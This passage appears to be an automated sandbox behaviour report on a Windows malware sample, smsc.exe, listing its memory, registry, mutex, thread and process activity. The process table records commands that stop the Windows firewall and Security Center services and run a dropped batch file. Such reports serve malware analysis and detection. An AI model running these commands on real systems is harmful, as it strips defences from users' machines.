\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_229376	query and write and read	commit	2690000	229376	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_245760	query and write and read	commit	2690000	245760	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_262144	query and write and read	commit	2690000	262144	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\UrlZonesSM_SYSTEM	query and write and read	commit	2190000	4096	own pid	read write	success or wait	1	40FF50

Registry Activities:

Key value set
Key Path	Name	Type	Data	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control	WaitToKillServiceTimeout	String	7000	success or wait	1	40AB29

Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SYSTEM\Setup	systemdates	success or wait	1	40A945
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	ComputerName	success or wait	1	408488

Mutant Activities:

Mutant created
Name	Completion	Count	Source Address
\BaseNamedObjects\dfgregrethgsnghjdg434grthgwer443we123	success or wait	1	407700

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
1944	C:\WINDOWS\system32\cmd.exe	cmd /c net stop SharedAccess	0	success or wait	1	40B100
1292	C:\WINDOWS\system32\cmd.exe	cmd /c c:\sdfeww.bat	suspended	success or wait	1	40B1C6
1692	C:\WINDOWS\system32\cmd.exe	cmd /c net stop Security Center	0	success or wait	1	40B1F1
444	C:\WINDOWS\system32\cmd.exe	cmd /c net start SharedAccess	0	success or wait	1	40B20B

Thread Activities:

Thread created
TID	PID	EIP	Injected	Filepath	Completion	Count	Source Address
1184	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40AC2F
948	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40AD61
2516	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	4077FA
3900	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40A4E8
3904	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40A4E8
3908	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40A4E8
1716	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	405C97
732	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	4066DF
1036	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	4068A0
1460	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
1516	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
340	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
524	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
920	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
580	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
508	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
724	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
160	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
456	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
1712	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
356	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
412	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
528	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
236	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
1440	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
368	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
1632	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
316	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
824	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
1128	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
1504	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
548	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
968	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
596	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
1332	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
1760	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2052	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2056	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2060	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2064	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2068	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2072	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2076	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2084	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2088	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2092	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2096	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2104	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2108	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2112	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2116	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2160	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2164	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2180	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2192	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2196	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2200	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2204	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2208	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2212	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2216	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2220	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2224	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2228	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2232	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	4068A0
2236	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2240	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2244	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2248	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2252	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2256	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2260	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2264	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2268	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2276	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2280	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2284	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2296	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2304	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2308	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2292	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2312	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2316	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2300	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2288	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2324	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2336	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2380	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2384	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2392	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2396	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2400	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2404	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2408	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2416	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2420	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2412	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2428	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2432	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2440	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2436	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2448	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2452	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2444	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2456	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2460	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2464	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
1168	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2472	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2468	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2476	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2480	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2484	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2488	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
1912	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2492	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2504	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2500	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2496	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2508	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2512	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2520	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2524	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2528	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2532	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2536	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2548	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2544	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2540	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630
2556	740	7C8106F9	false	C:\WINDOWS\system32\smsc.exe	success or wait	1	40F630

Thread delayed
TID	Delay	Completion	Count	Source Address
2376	2s	success or wait	522	40777A
9494	12s	success or wait	9	41059E
5910	10s	success or wait	1	410196
5910	5s	success or wait	1	4101CF
9494	12s	no status	0	41059E
14592	3600s	no status	0	4079E8
14596	3600s	no status	0	4079E8
14600	3600s	no status	0	4079E8
5910	30s	no status	0	4101E4

Thread terminated
TID	PID	Completion	Count	Source Address
732	740	success or wait	0	409C68

Memory Activities:

Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address
740	C:\WINDOWS\system32\smsc.exe	3F0000	12FCF4	page read and write	success or wait	3	482435

Memory attributes changed
PID	Filepath	Base	Length	New Protection	Old Protection	Completion	Count	Source Address
740	C:\WINDOWS\system32\smsc.exe	416600	1000	page execute and read and write	page read and write	success or wait	1	482992
740	C:\WINDOWS\system32\smsc.exe	416000	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416614	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
740	C:\WINDOWS\system32\smsc.exe	416228	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41622C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416230	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416234	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416238	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41623C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416240	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416244	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416248	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41624C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416628	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
740	C:\WINDOWS\system32\smsc.exe	416138	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41663C	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
740	C:\WINDOWS\system32\smsc.exe	416218	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41621C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416220	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416650	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
740	C:\WINDOWS\system32\smsc.exe	416280	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416284	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416288	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41628C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416290	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416294	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416298	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41629C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4162A0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4162A4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4162A8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4162AC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4162B0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4162B4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4162B8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4162BC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4162C0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416664	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
740	C:\WINDOWS\system32\smsc.exe	4162C8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416678	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
740	C:\WINDOWS\system32\smsc.exe	416254	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416258	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41625C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416260	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416264	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416268	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41626C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416270	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416274	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416278	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41668C	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
740	C:\WINDOWS\system32\smsc.exe	41620C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416210	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4166A0	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
740	C:\WINDOWS\system32\smsc.exe	4162D0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4166B4	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
740	C:\WINDOWS\system32\smsc.exe	416110	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416114	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416118	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41611C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416120	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416124	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416128	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41612C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416130	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4166C8	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
740	C:\WINDOWS\system32\smsc.exe	416140	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416144	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416148	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41614C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416150	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416154	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416158	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41615C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416160	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416164	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416168	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41616C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416170	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416174	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416178	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41617C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416180	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416184	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416188	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41618C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416190	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416194	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416198	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41619C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161A0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161A4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161A8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161AC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161B0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161B4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161B8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161BC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161C0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161C4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161C8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161CC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161D0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161D4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161D8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161DC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161E0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161E4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161E8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161EC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161F0	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161F4	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161F8	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4161FC	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416200	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416204	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	4166DC	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
740	C:\WINDOWS\system32\smsc.exe	416008	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41600C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416010	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416014	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416018	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41601C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416020	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416024	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416028	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41602C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416030	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416034	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416038	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41603C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416040	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416044	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416048	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41604C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416050	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416054	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	416058	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
740	C:\WINDOWS\system32\smsc.exe	41605C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
